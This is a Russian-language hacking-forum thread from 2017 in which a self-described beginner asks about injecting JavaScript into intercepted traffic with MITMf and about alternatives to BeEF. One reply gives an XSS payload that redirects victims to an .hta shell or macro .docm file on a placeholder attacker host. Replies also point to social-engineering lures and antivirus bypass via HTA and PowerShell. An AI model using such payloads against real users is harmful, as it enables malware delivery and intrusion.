Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Beef или не beef? Вот в чем вопрос. (https://forum.antichat.xyz/showthread.php?t=450414)

dom1 12.04.2017 21:55
Всем доброго времени суток.

Не так давно начал интересоваться пентестингом (да-да я шарю за модные словечки).

Покурил инфу про MITMF - всё замечательно.

Дошли руки до инжекта JS.

Побаловался с alert('Hola'); - тоже всё замечательно.

Само собой, захотелось инжектить что-то более-менее интересное.

Покурил информацию про Beef - оказался кал в блестящей обертке: хук еще попробуй заинжекти, думает долго, делает долго, работоспособность многих модулей огорчила.

В общем задумка то классная, а вот реализация ожиданий не оправдала.

Итого: интересуют какие-либо аналогичные фреймворки и, впрочем, любая информация / мысли по поводу инжектов через MITMF.

В сети информации минимум, начал читать книги по JS, научился модифицировать страницы посредством JS, но, думаю, потенциал у этой развлекухи бОльший.

Всем спасибо за внимание (многобукафф утомляют, знаю).

Надеюсь что кто-нибудь что-нибудь таки предложит. Тапки не кидать - своих достаточно.

SooLFaa 15.04.2017 00:03
Хочешь самый клевый пэйлоад для ХSS?!

Отвечу сразу: document.location.href = 'http://www.hacker.ru/shell.hta' или document.location.href = 'http://www.hacker.ru/file.docm'

dom1 15.04.2017 00:22
Цитата:
Сообщение от SooLFaa
SooLFaa said:

Хочешь самый клевый пэйлоад для ХSS?!
Отвечу сразу: document.location.href = '
http://www.hacker.ru/shell.hta
' или document.location.href = '
http://www.hacker.ru/file.docm
'
И чем это закончится? Скачиванием шелла? А запускать его кто будет?

SooLFaa 15.04.2017 01:47
Цитата:
Сообщение от dom1
dom1 said:

И чем это закончится? Скачиванием шелла? А запускать его кто будет?
Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.

dom1 15.04.2017 01:51
Цитата:
Сообщение от SooLFaa
SooLFaa said:

Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.
Спасибо. Пошел читать гугол.

dom1 16.04.2017 05:00
Цитата:
Сообщение от SooLFaa
SooLFaa said:

Гугли что такое hta и как оно работает. Все нагрузки бифа работают тоже с соц инженерией так или иначе. Начиная от фейк флэш апдейта и заканчивая доком с макросами. А те нагрузки, которые юзают утечку памяти в браузерах работали еще в бородатые времена.
http://clip2net.com/clip/m297191/92e....png?nocache=1

При таком раскладе уже лучше beef юзать

SooLFaa 16.04.2017 13:36
Цитата:
Сообщение от dom1
dom1 said:

http://clip2net.com/clip/m297191/92e....png?nocache=1
При таком раскладе уже лучше beef юзать
Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.

dom1 16.04.2017 18:00
Цитата:
Сообщение от SooLFaa
SooLFaa said:

Вот как правило, те кто юзают всякие программки без знаня дела и имеют проблемы как на твоем скрине. Скрипт кидисами таких еще называют, а если бы ты копнул глубже и немного включил голову, то понял бы что вариантов байпассить АВ в том числе стандартный хромовский есть очень много. Я это не корнетно про hta а в целом в том числе powerhell.
Я еще в топике написал что я полный ноль. Я сразу сказал что НЕ обладаю знанием дела. Потому и начал спрашивать. Ты в меня кинул 3 буквы hta и я пошел с ними в гугол. Интересно, ты чего ожидал?)


Время: 00:35